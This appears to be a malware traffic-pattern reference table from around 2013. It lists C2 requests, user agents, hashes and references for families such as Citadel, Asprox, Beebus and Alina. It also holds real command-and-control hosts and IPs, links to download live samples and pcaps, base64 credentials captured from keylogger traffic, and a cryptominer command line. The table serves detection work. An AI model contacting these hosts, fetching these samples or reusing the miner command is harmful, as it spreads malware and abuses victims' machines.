MALWARE TRAFFIC PATTERNS
See the new version of this table at deependdata.blogspot.com
Columns: Carberb | Type | beeb | POST/GET | Pattern | Network Traffic Pattern | Ports (if not 80) | Notes | Known UA | Strings | MD5s | DL Sample | DL pcap | Analysis Date | References URLs | Credit
Date: 4/30/2013 | Type: APT | Name: beeb
Traffic: 9002..................wx....9002..................wx....9002.......................9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode.
MD5s: D4ED654BCDA42576FDDFE03361608CAA
3de314089db35af9baaeefc598f09b23 (doc dropper)
2568615875525003688839cb8950aeae (doc dropper)
DL Sample: http://bit.ly/aptsamples
DL pcap: http://bit.ly/aptpcaps
Analysis Date: 2013-02
References: http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
Date: 4/30/2013 | Type: APT | Name: 9002 | POST/GET: POST
Pattern: POST /2d HTTP/1.1
Traffic:
HTTP 189 POST /0 HTTP/1.1
HTTP 189 POST /1 HTTP/1.1
HTTP 189 POST /2 HTTP/1.1
HTTP 189 POST /3 HTTP/1.1
HTTP 189 POST /4 HTTP/1.1
HTTP 189 POST /f HTTP/1.1
HTTP 190 POST /10 HTTP/1.1
HTTP 190 POST /11 HTTP/1.1

POST /2d HTTP/1.1
User-Agent: lynx
Host: ieee.boeing-job.com
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache
AA
Known UA: lynx
MD5s: 3de314089db35af9baaeefc598f09b23 (doc dropper)
2568615875525003688839cb8950aeae (doc dropper)
Analysis Date: 2013-02
References: http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
Date: 5/29/2013 | Type: Crime | Name: Adware Hotbar
Pattern: POST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1
Traffic:
POST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: gUcmpCp
User-Agent: NSIS_Inetc (Mozilla)
Host: b.compqueue.com
Content-Length: 276
Connection: Keep-Alive
Cache-Control: no-cache
epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c....
Known UA: User-Agent: NSIS_Inetc (Mozilla)
MD5s: e8022373bc452ab06c49752ce20c5cc2
e7f41ba37a3c57dd31de45f0c1f855a1
d689f23246bd49b01bd30b5926e992ba
Analysis Date: 2013-05
References: http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795
Date: 8/11/2013 | Type: Crime | Name: Alina POS v5.6
Pattern: POST /duck/push.php HTTP/1.1
Traffic:
POST /duck/push.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache
Known UA: User-Agent: Alina v5.6
Strings: http://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-crime.html
MD5s: 5A22ED78B6454E34217D07C4AF37B23B
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-06
References: http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Date: 8/11/2013 | Type: Crime | Name: Alina POS v5.6
Pattern: POST /adobe/version_check.php HTTP/1.1
Traffic:
POST /adobe/version_check.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache
Known UA: User-Agent: Alina v5.3
Strings: http://contagioexchange.blogspot.com/2013/08/alina-pos-strings-crime.html
MD5s: 4c754150639aa3a86ca4d6b6342820be
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-06
References: http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Date: 8/11/2013 | Type: Crime | Name: Alina POS v6.0
Pattern: POST /adobe/version_check.php HTTP/1.1
Traffic:
POST /adobe/version_check.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache
Known UA: User-Agent: Alina v6.0
Analysis Date: 2013-08
References: http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Date: 4/28/2013 | Type: Crime | Name: Andromeda
Pattern: POST /new/gate.php HTTP/1.1
Traffic:
POST /new/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Content-Length: 32
Host: seantit.ru

mejRs96VP96+PIRfAjNy+Izj9E8jZscm
Known UA: Mozilla/4.0
Strings: http://contagioexchange.blogspot.com/2013/08/andromeda-bot-strings-crime.html
MD5s: 85F908A5BD0ADA2D72D138E038AECC7D
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-04
References: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 4/28/2013 | Type: APT | Name: APT1_WEBC2_RAVE
Pattern: GET /comp/sem/resources.htm HTTP/1.1
Traffic:
GET /comp/sem/resources.htm HTTP/1.1
User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
The Trojan parses (0x004016D0) the received data for the HTML comment tags:
<!-- [Base64 encoded data] -->
Known UA: HTTP Mozilla/5.0(compatible+MSIE)
Strings: http://contagioexchange.blogspot.com/2013/08/webc2-rave-strings-apt.html
MD5s: a2534e9b7e4146368ea3245381830eb0
Analysis Date: 2011-05
References: http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/
Date: 6/6/2013 | Type: Crime? | Name: ArcomRat / Dokstormac
Pattern: S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
Traffic:
S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
various samples
Ports: 1866, 1888, 1865, 1890
Notes: Crime or APT? Possibly some MidEast RAT; NO...NO...NO... in the traffic; preceded by a GET request for a file with odd extensions like .awe or .avf
User-Agent: MSIE 7.0 for the file GET request
unpacked samples have extensive Unicode strings
MD5s: 62B4C4432361C9B4B69C480C07AFA356
191FDC32304C50D9A054420E59BD21A9
4015DD5B27EB612CA5DC320033E284C5
DL Sample: http://bit.ly/crimesamples
Analysis Date: 2013-05
References: http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356
http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2
Date: 6/6/2013 | Type: Crime? | Name: Ardamax keylogger
Pattern:
220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
Traffic:
220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8 BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE
AUTH LOGIN
334 VXNlcm5hbWU6
bGludXgwNjQwMEB5YWhvby5jb20=
334 UGFzc3dvcmQ6
YXplcnR5LzA2
235 2.0.0 OK
MAIL FROM:
Ports: 25
Notes: login in base64
MD5s: E33AF9E602CBB7AC3634C2608150DD18
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-05
References: http://www.ardamax.com/keylogger/
Date: 4/30/2013 | Type: Crime | Name: Asprox | POST/GET: Checkin
Pattern: GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1.1
Traffic:
GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
Notes: initial "check-in" communication. The URL path is RC4 encrypted, the key to which is the first eight characters:
key = "4213D518"
Known UA: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
References: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Date: 4/30/2013 | Type: Crime | Name: Asprox | POST/GET: GET list of C2s
Pattern: GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1
Traffic:
GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
Ports: 8080
Notes: acquire the latest list of C&C server locations
Known UA: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Analysis Date: 2013
References: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Date: 4/30/2013 | Type: Crime | Name: Asprox | POST/GET: GETs spam template
Pattern: GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1.1
Traffic:
GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Transfer-Encoding: base64
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 50.22.136.150:8080
Connection: Keep-Alive
Ports: 8080
Notes: Other communications look very similar except for a different content type, depending on activity. See the reference. The smtpWorker.dll.crp (smtpWorker.dll) module is downloaded when the C&C server issues the command c=rdl&u=/get/smtpWorker.dll.crp&a=0&k=9c59ca70&n= using the Kuluoz downloader. GETting spam template
Known UA: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Analysis Date: 2013
References: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
Date: 5/1/2013 | Type: Crime | Name: Avatar Rootkit
Pattern: GET /search?query=EZTFDHWP&sort=relevance HTTP/1.1 http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance
Traffic:
GET /search?query=EZTFDHWP&sort=relevance HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0)
Host: groups.yahoo.com
Notes: SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP
EZTFDHWP is used for the subsequent search request on Yahoo groups - see paper for more info
Known UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0)
Strings: Global\{%s}`000000000000000000000000000000002
Global\{%s}`000000000000000000000000000000001
Unicode
\KernelObjects\%SCondition`0000000000000
%suxtheme.dll;%scryptbase.dll
MD5s: Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57
Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde
DL Sample: http://bit.ly/crimesamples
Analysis Date: 2013-05
References: http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/
Date: 4/28/2013 | Type: APT | Name: backdoor ?
Pattern: GET /18110123/page_32262308.html HTTP/1.1
Traffic:
GET /18110123/page_32262308.html HTTP/1.1
Accept:
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: cuteoverload.dyndns.org
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Known UA: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Analysis Date: 2012-09
References: http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14
Date: 4/28/2013 | Type: APT | Name: Banechant | POST/GET: 1
Pattern: GET /IGKKT HTTP/1.1
Traffic:
GET /iGKKT HTTP/1.1
Accept: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: ow.ly
Connection: Keep-Alive . . . .

Error 301, implicitly redirects to malicious site
HTTP/1.1 301 Moved Permanently
Date: Fri, 15 Mar 2013 16:31:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.18
set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate,POST-check=0, pre-check=0
Pragma: no-cache
Location: http://symbisecure.com/update/winword.pkg
X-Gridnum. T3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
connection: close
Content-Type: text/html
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
Analysis Date: 2013-04
References: http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Date: 4/28/2013 | Type: APT | Name: Banechant | POST/GET: payload dl 2
Pattern: GET /adserv/logo.jpg HTTP/1.1
Traffic:
GET /adserv/logo.jpg HTTP/1.1
Accept: image/jpeg
User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)
Connection: Keep-Alive
host: . symbisecure.com
Known UA: Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)
Analysis Date: 2013-04
References: http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Date: 5/2/2013 | Type: Crime | Name: Beebone downloader
Pattern:
GET /0/?f|-1813912965Admin
GET a/76876332/1
{random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username}
Traffic:
GET /0/?f|-1813912965Admin
GET /1/?b|-2020396961winxp
GET /2/?f|-1396129654Guest
GET /9/?a|-1312965453MyPC
GET /0/?f|-2713912961Developer
GET /0/?b|-5711296542Windows7
GET /1/?a|-1296545361Administrator
GET /0/?f|-1813912965Admin
GET a/76876332/1
GET /a/76876332/bb1
Ports: Random, 41001, 30980, 8080, 443
Notes: always
Known UA: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
Analysis Date: 2013-05
References: http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link
Date: 4/28/2013 | Type: APT | Name: Beebus
Pattern: GET /windosdate/v6/defau1t.aspx?ln=en-us HTTP/1.1
Traffic:
GET /windowsupdate/v6/defau1t.aspx?ln=en-us HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: update.microsoft.com
Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57
Notes: Beebus initial GET request
Known UA: Mozilla/4.0 (compatible; )
Analysis Date: 2013-02
References: http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Date: 4/28/2013 | Type: APT | Name: Beebus | POST/GET: C2 checkin
Pattern: GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
Traffic:
GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 68.96.31.136
Notes: Beebus C2 checkin
Known UA: Mozilla/4.0 (compatible; )
Strings: http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html
MD5s: d7ec457be3fad8057580e07cae74becb
Analysis Date: 2011-09
References: http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Date: 4/28/2013 | Type: APT | Name: Beebus | POST/GET: C2 checkin
Pattern: GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
Traffic:
GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: bee.businessconsults.net
Notes: Beebus C2 checkin
Known UA: Mozilla/4.0 (compatible; )
Strings: http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html
MD5s: 7ed557921ac60dfcb295ebabfd972301
Analysis Date: 2011-04
References: http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Date: 4/28/2013 | Type: APT | Name: Beebus | POST/GET: data send
Pattern: POST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1
Traffic:
POST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host:
Content-Length: 563
Connection: Keep-Alive
Cache-Control: no-cache
Notes: Beebus data send
Strings: http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html
Date: 5/12/2013 | Type: Crime | Name: Bitcoinminer
Pattern:
POST / HTTP/1.1
Authorization: Basic cXdlcnR5MTIzLjE6eA==
Traffic:
POST / HTTP/1.1
Authorization: Basic cXdlcnR5MTIzLjE6eA==
Host: www2.x3x4.su:666
Accept-Encoding: deflate, gzip
Content-Type: application/json
Content-Length: 45
User-Agent: cpuminer 2.2.3
X-Mining-Extensions: midstate

{"method": "getwork", "params": [], "id":0}
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 12 May 2013 22:56:11 GMT
Content-Type: application/json
Content-Length: 635
Connection: keep-alive

{"result": {"data": "000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000", "hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000", "midstate": "b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2", "algorithm": "scrypt:1024,1,1", "target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000"}, "id": 0, "error": null}
Ports: 666
Known UA: User-Agent: cpuminer 2.2.3
MD5s: 12E717293715939C5196E604591A97DF
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2013-05
Date: 8/8/2012 | Type: CRIME | Name: BitcoinMiner
Pattern: {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
Traffic:
{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
{"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]}
{"params": [63], "id": null, "method": "mining.set_difficulty"}
{"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208", "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000", ["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", "ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], "00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"}
{"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]}
Ports: 9000
Notes: downloaded by Bitblazer. Part of a tool package including bat file with "system.exe --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.4:123
P
Known UA: none in request but file strings:
User-Agent: suckergo/2.3.2
Strings: http://contagioexchange.blogspot.com/2013/08/bitcoinminer-strings-crime.html
MD5s: e2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 8/8/2012
References: http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
Date: 4/28/2013 | Type: Crime EK | Name: Blackhole 2
Pattern: GET /fded177fe12651bb038f3f11b01c4168/q.php HTTP/1.1
Traffic:
GET /fded177fe12651bb038f3f11b01c4168/q.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 193.93.248.227
Connection: Keep-Alive
Notes: compromised site - malvertising on www.jobs-located-near.com redirects to the BH landing page via iframe
Known UA: victim UA
Analysis Date: 2013-04
References: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 5/29/2013 | Type: Crime | Name: Blackhole v2
Pattern: GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 HTTP/1.1
Traffic:
GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 HTTP/1.1
User-Agent: Java/1.7.0_10
Host: bandirmacatiemlak.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Notes: an attempt is made to exploit a known vulnerability in jdk.
Known UA: User-Agent: Java/1.7.0_10
Analysis Date: 2013-05
Date: 8/8/2012 | Type: CRIME | Name: Blazebot
Pattern:
NICK USA|94576
USER vtptdwd 0 0 :USA|94576
Traffic:
NICK USA|94576
USER vtptdwd 0 0 :USA|94576
:DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname...
:DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now.
PING :5FC26DC1
PONG :5FC26DC1
JOIN #fkyou# stay0ut
:DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp]
Ports: 6667
Notes: IRC
DL Sample: http://bit.ly/crimesamples
Analysis Date: 8/8/2012
References: http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
Date: 4/30/2013 | Type: Crime | Name: Carberp
Pattern: POST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm
Traffic:
POST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: caaarrp2.ru
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Notes: content of the form looks like this:

kfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D
where 'kfq' is a randomly generated string which is concatenated with the equality sign and an encoded message
Known UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Analysis Date: 2012-03
References: http://blog.avast.com/2013/04/08/carberp_epitaph/
Date: 11/12/2013 | Type: CRIME | Name: ChePro (Brazil.banker)
Pattern: GET /ini/xvwmmwb.mod HTTP/1.1
Traffic:
GET /ini/xvwmmwb.mod HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive
Notes: embedded in RTF
Known UA: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Strings: http://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html
MD5s: 2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 11/12/2013
References: http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files
Date: 8/21/2013 | Type: Crime | Name: Chimerka.1 / Refyes.A
Pattern: POST /sys.php HTTP/1.0
Traffic:
POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112
Known UA: User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Strings: http://contagioexchange.blogspot.com/2013/08/refeysa-strings-crime.html
MD5s: bede0da1abc1122acf8af91f6d6b289f
DL Sample: http://bit.ly/crimesamples
Analysis Date: 2013-08
References: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2
Date: 4/28/2013 | Type: Crime | Name: Citadel
Pattern: POST /g.php HTTP/1.1
Traffic:
POST /g.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: nologo0091.org
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache
......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>..
Known UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Strings: http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-2.html
http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-1.html
DL Sample: http://bit.ly/crimesamples
DL pcap: http://bit.ly/crimepcaps
Analysis Date: 2012-05
References: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Date: 4/28/2013 | Type: Crime | Name: Citadel (Zbot var)
Pattern: POST /C270suqdh/file.php HTTP/1.1
Traffic:
POST /C270suqdh/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: vivaspace2013.com
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu.......
Known UA: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Strings: http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-2.html
http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-1.html
MD5s: 3D6046E1218FB525805E5D8FDC605361
